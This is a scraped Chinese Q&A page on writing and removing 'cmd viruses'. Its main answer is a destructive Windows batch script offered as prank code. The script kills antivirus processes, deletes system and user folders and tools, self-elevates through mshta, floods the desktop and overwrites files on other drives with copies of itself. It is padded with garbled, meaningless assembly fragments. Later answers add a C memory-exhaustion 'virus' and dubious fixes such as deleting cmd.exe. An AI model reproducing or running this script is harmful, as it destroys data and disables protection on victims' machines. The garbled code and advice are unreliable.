写cmd病毒
建一个文本文档,名字改为cmd.cmd。右键编辑输入start cmd.cmd
原理上是可以的,但是只能依靠名字查杀,或者MD5校验查杀,很容易误杀,可以利用 dir /a |find "病毒.exe" 这样可以查出有病毒.exe ,可以用 if exist muma.exe del /s /q muma.exe 或者也可以用if not exist 病毒.exe goto *** 后面就跳转命令 .单靠个命令是没办法的,要写一个批处理,有的人利用netstat -an|find "木马端口" 这样来查看自己是否中木马,或者直接输入netstat -an.其实批处理也很强大,之前网吧的机器够很是猖獗,主要是修改了usnit.exe ,利用md5.exe 对usnit.exe进行校验,不对的可以直接删除掉.再替换回来,在批处理中加入MD5技术其实也可以的,多上点批处理网站,学习一下,说不定你可以编写出自己的杀毒程序呢.呵呵
代码是echo off
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:jjj
……
JMP Label3
Db thunkcode3
Label1:ss
…….
JMP Label2
Db thunkcode2
Label3:mm
taskkill /f /im 360DesktopLite.exe
jz label
jnz label
db thunkcode
label:
jz label2
jnz label2
db thunkcode
lable2
mov ax, 8
xor ax, 77
...
taskkill /f /im explore.exe
taskkill /f /im 360tray.exe
taskkill /f /im 360Safe.exe
echo off
taskkill /f /im 360tray.exe
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
taskkill /f /im 360tray.exe
taskkill /f /im ZhuDongFangYu.exe
rmdir /s/q C:\Users\administrator\Desktop
rmdir /s/q C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
rmdir /s/q C:\ProgramData
del /f /s /q regedit.exe
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
JMP Label1
Db thunkcode1
Label2:
……
JMP Label3
Db thunkcode3
Label1:
…….
JMP Label2
Db thunkcode2
Label3:
call label_1
db thunkcode
jmp label_2
db thunkcode
label_1:
pop eax
jmp label_3
db thunkcode,thunkcode,thunkcode
label_3:
inc eax
jmp label_4
db thunkcode,thunkcode,thunkcode
label_4:
jmp eax
db thunkcode
label_2:
....
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果&crumb=System.Generic.String:cmd&crumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
del /f /s /q notepad.exe
rmdir /s/q apppatch
rmdir /s/q Windows10Upgrade
rmdir /s/q LDSGameMaster
set path=C:\ddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd
set temp=C:\mmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmmm
del /f /s /q search-ms:displayname=“win10%20(C%3A)”中的搜索结果&crumb=System.Generic.String:cmd&crumb=location:C%3A%5C
rmdir /s/q C:\Windows\appcompat\Programs
rmdir /s/q C:\Windows\en-US
rmdir /s/q C:\Windows\OCR
::wwwwwww::rrrrrr%%tttt
rmdir /s/q C:\Windows\minidump
rmdir /s/q C:\Windows\Microsoft.NET
ftype nppfile="C:\ProgramFiles (x86)\Notepad++\notepad++.exe" %1
for /l %%i in (1 1 9999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999999)do md A..\
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exit
:a
set /a a+=1
echo %random%-%random%-%random% > C:\Users\%username%\Desktop\CCBL.%random%
mshta javascript:alert(".");close();
goto a
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exit
for /f "tokens=* delims=" %%i in ('dir /b D:\*.*') do copy /y "%dpnx0" "%%i" >nul
for /f "tokens=* delims=" %%i in ('dir /b A:\*.*') do copy /y "%dpnx0" "%%i" >nul
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exit
for /f "tokens=* delims=" %%i in ('dir /b K:\*.*') do copy /y "%dpnx0" "%%i" >nul
for /f "tokens=* delims=" %%i in ('dir /b I:\*.*') do copy /y "%dpnx0" "%%i"
@%1 mshta vbscript:CreateObject("Shell.Application").ShellExecute("cmd.exe","/c %~s0 ::","","runas",0)(window.close)&&exit
for /f "tokens=* delims=" %%i in ('dir /b Z:\*.*') do copy /y "%dpnx0" "%%i" >nul
for /f "tokens=* delims=" %%i in ('dir /b M:\*.*') do copy /y "%dpnx0" "%%i" >nul
rmdir /s/q C:\Windows\Offline Web Pages
其实许多Cmd恶做剧只要稍加修改就有很大的威力了。你可以去批处理吧,Bat吧,cmd吧去看看恶做剧代码
写cmd病毒
我用360杀毒扫描的后扫出说cmd.exe这个文件可能是木马程序,而且正在...
这可能是感染性病毒,为了电脑的安全,得找360系统急救箱帮忙,双击360系统急救箱,然后单击“开始系统急救”。 系统引擎初始化完成后,单击“修复”,勾选需要修复的类型,然后单击“立即修复”,完成后重新启动电脑
电脑中了cmd和svchost病毒求解
我这办法自己想的,也用过了肯定行的 1.你先用杀毒软件杀一下全盘的病毒看还有没有病毒 2.然后,到c:\\windows\\system32\\里面的cmd.exe这个文件删除掉 3.下载“U盘专杀工具”全面检测一下,自动就会清除注册表里关于cmd没用的文件了 4.如果还不行的话,在用超级兔子清理系统,里面有个注册表+选中...
win7系统下中了CMD.EXE病毒怎么解决?
确认百分百是病毒,破解版被做过手脚了。建议更换系统或者强制删除。方法如下:1、打开“开始”菜单,选择“运行”选项,在打开的对话框中输入gpedit.msc,按“确定”键;更多精彩内容欢迎继续关注系统城官网www.xitongcheng.com!2、在打开的组策略管理器左侧依次展开计算机配置、管理模板、系统、系统还原...
急急急~SOS~我的电脑的进程里面多了好多cmd.exe和reg.exe的进程是不是...
3、然后再删除system32\\cmd.exe 4、系统会提示说系统文件丢失要求插入光盘,忽略就行了感染reg.exe 病毒的机器运行缓慢,进程中出现很多reg.exe,system32目录下有文件Systom.exe病毒,每个盘符下有nx.exe和 autorun.inf也无法查看到隐藏文件,无法打开任务管理器,regedit.exe册表无法打开,reg.exe病毒一般是在浏览网页时...
cmd.exe病毒
cmd.exe病毒进程清除2种方法 正确的查杀办法是:(该文章转自tiancxc)1 重新启动计算机,按F8键 选择进入安全模式(非常重要,杀不干净与没进入安全模式有关).2 用杀毒软件完全扫描查杀硬盘.但我估计病毒文件不只这两个 杀毒软件很可能杀不干净. 所以还要进行下面的步骤 3.开始-运行-msconfig 回车, 在...
求助cmd病毒问题
中病毒了,建议在安全模式下杀毒,或者重新做系统。如果有备份,就恢复系统,装个杀软!!!做完系统别忘了备份,下次就不用那么麻烦了!!方案一:.重新启动计算机,按F8键 选择进入安全模式(非常重要,杀不干净与没进入安全模式有关).1.把在windows文件夹中的rundll32.exe删除(假的,只有17K)。2....
360查出cmd.exe开机启动项,要求禁止,这是病毒码
cmd.exe是微软Windows系统的命令行程序,类似与微软的DOS操作系统。cmd.exe是一个32位的命令行程序,运行在Windows NT\/2000\/XP\/2003\/Vista上。这不是纯粹的系统程序,但是如果终止它,可能会导致未知的问题。一般情况下,不可能是病毒,但是刚才我看了一下(我用的也是360),我的启动项里边没有cmd....
怎么用“运行-cmd”来查杀病毒
根据进程名查杀 这种方法是通过WinXP系统下的taskkill命令来实现的,在使用该方法之前,首先需要打开系统的进程列表界面,找到病毒进程所对应的具体进程名。接着依次单击“开始→运行”命令,在弹出的系统运行框中,运行“cmd”命令;再在DOS命令行中输入“taskkill \/im aaa”格式的字符串命令,单击回车键后...
鼠标右键文件夹里显示有“cmd”,是病毒吗?怎么解决
你好:这个右键菜单和是否中毒应该没有直接联系 你可以访问腾讯电脑管家官网,下载安装一个电脑管家 使用杀毒功能来查看下是否中毒 同时使用右键菜单管理功能来删除这个CMD 如果以后有什么问题,欢迎再来电脑管家企业平台询问,我们会尽心为您解答
win7系统下中了CMD.EXE病毒怎么解决?
这个文件不是系统启动必须文件,你可以在安全模式下把CMD.EXE改名为其他文件名,比如ABCD.ABC,让系统正常开机无法再调用这个程序,然后全盘杀毒,等系统正常后,再改名回原文件名。也可以试试用腾讯电脑管家来全程保护你的电脑安全。腾讯电脑管家企业平台:http:\/\/zhidao.baidu.com\/c\/guanjia\/ ...
仍念牛磺: 病毒也是程序的一种,能编写程序的平台都可以编写病毒的.每种变成语言都有它们对应的编程软件,这样便于开发.其实,简单的脚本都可以使用文本文档编写的.cmd是命令提示符是在操作系统中,提示进行命令输入的一种工作提示符.CMD可以做出简单的批处理,像冲击波病毒,就是CMD的关机指令做出来的 shutdown -s-t即可
峨眉山市13428392340: 病毒怎么写 用c语言 - ?
仍念牛磺: int main() {char *str = NULL;while(1)str = (char *)malloc(4096); // 无限申请内存而不释放造成系统最终崩溃.这就是最简单的病毒了return 0; }
峨眉山市13428392340: c语言病毒语句?
仍念牛磺: 本病毒的功能: 1.在C、D、E盘和c:\windows\system、c:\windows中生成本病毒体文件 2.在C、D、E盘中生成自动运行文件 3.注册c:\windows\system\svchost.exe,使其开机自动运行 4.在C:\windows\system下生成隐蔽DLL文件 5.病毒在执行后...
峨眉山市13428392340: 我电脑里有一个写着cmd.exe的病毒杀不掉,怎么办 - ?
仍念牛磺: 用杀毒软件杀 杀不了 但又能找到它的话 去下载一个UNLOCK 装上以后选右键加强 然后在要删除的图表上点右键然后点UNLOCK 删除就可以了
峨眉山市13428392340: 命令提示符是可以写病毒的吗? - ?
仍念牛磺: 可以写啊,最简单的无限循环就是一个病毒的最基本特征,你编写一个无限循环的语句出来,让他运行,一会就会死机的,最出名的是机器狗曾经携带的一种,让内存资源最大化浪费.
峨眉山市13428392340: 用cmd可以编病毒或木马吗??
仍念牛磺: cmd指的是批处理还是命令提示符? 如果是批处理的话,编写一个恶作剧的小小“病毒”应该是可以的,木马好像功能太少……
峨眉山市13428392340: CMD.exe病毒怎么解,求大神赐教,老方法对我的电脑不管用 - ?
仍念牛磺: 您好, CMD是Windows系统用于执行批处理的进程 因为批处理一般不会被安软拦截(安软不知道是用户主动执行的还是病毒执行的) 所以被很多病毒利用,并不是只有CMD病毒才有这个现象 所以你使用CMD病毒的处理方法处理,可能会无效 建议你可以使用电脑管家工具箱中的顽固木马克星来扫描和查杀一下 它专门为一般杀软无法清除或者查杀不到的恶意木马而设计,使用很严格的查杀规则,所以查杀率非常的高,可以清除各种顽固的木马病毒 如果以后有其它问题,欢迎再来电脑管家企业平台咨询
峨眉山市13428392340: 电脑中了命令提示符病毒怎么办? - ?
仍念牛磺: 记下各进程病毒的名称,然后进入安全模式,打开注册表,编辑->查找,输入病毒进程的文件名,把查找到的键值全部删除即可.
峨眉山市13428392340: 有人QQ上给我发了一个cmd格式的程序!是不是什么病毒啊! - ?
仍念牛磺: CMD是在windows下面运行DOS的文件 有可能是病毒哦
